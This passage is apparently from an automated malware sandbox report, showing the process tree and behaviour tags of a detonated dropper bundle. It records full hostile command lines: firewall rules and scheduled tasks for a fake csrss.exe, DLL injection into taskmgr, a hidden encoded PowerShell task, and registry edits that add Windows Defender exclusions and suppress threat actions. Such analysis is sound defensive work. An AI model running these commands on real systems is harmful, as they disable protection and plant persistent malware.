- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4900 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3464
-
-
C:\Users\Admin\Pictures\4BB4lI7t5tls4oaeCojmPguo.exe"C:\Users\Admin\Pictures\4BB4lI7t5tls4oaeCojmPguo.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1304
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2248
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3196
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:448
-
-
-
-
C:\Users\Admin\Pictures\tb4IzGgTXDqdahLq6zcyrMSD.exe"C:\Users\Admin\Pictures\tb4IzGgTXDqdahLq6zcyrMSD.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2340
-
-
C:\Users\Admin\Pictures\tb4IzGgTXDqdahLq6zcyrMSD.exe"C:\Users\Admin\Pictures\tb4IzGgTXDqdahLq6zcyrMSD.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3104
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:4040
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:3560
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1036
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:632
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:3888 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:2056
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:4492 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:1044
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:1732
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:3532
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:4024
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Executes dropped EXE
PID:2744 -
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:3716
-
-
-
-
-
-
C:\Users\Admin\Pictures\SR8r1fGXkfJwLNsVVFuqln2W.exe"C:\Users\Admin\Pictures\SR8r1fGXkfJwLNsVVFuqln2W.exe"3⤵
- Executes dropped EXE
PID:4240
-
-
C:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exe"C:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exe" --silent --allusers=03⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exeC:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.66 --initial-client-data=0x2c0,0x2e4,0x2e8,0xc4,0x2ec,0x6ed69558,0x6ed69564,0x6ed695704⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2152
-
-
C:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exe"C:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=656 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240126190611" --session-guid=ae370165-9d80-4fa7-a410-0e02d9a720ca --server-tracking-blob=ZWZkZjMwY2QxZjI0NzA2YjJlN2QzZjRiYWI3YmNjMmIwM2U3YjA1ODNhYTVjYjg1ZmZjZDAxZmQyZmJkYjc5Mzp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNjI5NTk2NC4zNDc3IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI4Zjc0MDA0Yy1lMzE0LTRmODQtYTAyZC0zN2Q5ZWQyNDY2YTMifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=60040000000000004⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of WriteProcessMemory
PID:1816
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\aH61TFChdeJtMgESTog4SHo0.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\aH61TFChdeJtMgESTog4SHo0.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4736
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"4⤵
- Executes dropped EXE
PID:2860
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\assistant_installer.exe" --version4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202401261906111\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.16 --initial-client-data=0x274,0x278,0x27c,0x250,0x280,0x7c2614,0x7c2620,0x7c262c5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3584
-
-
-
-
C:\Users\Admin\Pictures\SMWfDLGtgBUDr1BgQF6ZSW2T.exe"C:\Users\Admin\Pictures\SMWfDLGtgBUDr1BgQF6ZSW2T.exe"3⤵
- Executes dropped EXE
PID:4676 -
C:\Users\Admin\AppData\Local\Temp\7zSC8FD.tmp\Install.exe.\Install.exe4⤵
- Executes dropped EXE
PID:2672 -
C:\Users\Admin\AppData\Local\Temp\7zSCC49.tmp\Install.exe.\Install.exe /LzfYdidLoSR "385118" /S5⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
PID:2508 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"6⤵PID:3172
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&7⤵PID:232
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:648⤵PID:3888
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:328⤵PID:2640
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"6⤵PID:2936
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&7⤵PID:2744
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:328⤵PID:3436
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:648⤵PID:2472
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gMtnMrffB" /SC once /ST 02:47:38 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="6⤵
- Creates scheduled task(s)
PID:2100
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gMtnMrffB"6⤵PID:712
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmfUAJAHieefCXsdaD" /SC once /ST 19:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\OHhyuzm.exe\" hp /Jfsite_idEgK 385118 /S" /V1 /F6⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5080
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gMtnMrffB"6⤵PID:1012
-
-
-
-
-
C:\Users\Admin\Pictures\0oZh5cYXBl8lBcDmHCsfbXMu.exe"C:\Users\Admin\Pictures\0oZh5cYXBl8lBcDmHCsfbXMu.exe" PeJj3z5KgQO+REOMHfxRWZMfrERTkhHmRUWETPcQX9Iwim5oqDrINyf9NcQnEA==3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
-
C:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exeC:\Users\Admin\Pictures\aH61TFChdeJtMgESTog4SHo0.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.66 --initial-client-data=0x2ec,0x2f0,0x2f4,0x2bc,0x2f8,0x6ddd9558,0x6ddd9564,0x6ddd95701⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4756
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes1⤵
- Modifies Windows Firewall
PID:4776
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4536 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5080
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:2620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:4144
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1444
-
C:\Windows\SysWOW64\timeout.exetimeout /t 51⤵
- Delays execution with timeout.exe
PID:1444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1996 -ip 19961⤵PID:920
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)1⤵
- Launches sc.exe
PID:4404
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:1204
-
C:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\OHhyuzm.exeC:\Users\Admin\AppData\Local\Temp\mrTyqNDBdkhwJTRHw\nfxPIWAHevJCnXs\OHhyuzm.exe hp /Jfsite_idEgK 385118 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3088 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4700 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3436
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:1428
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:2344
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:3556
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:4872
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:4872
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:1740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:3356
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5040
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:4544
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:2996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:1500
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:4156
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:4452
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:4712
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:2472
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:4692
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4852
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:720
-
-
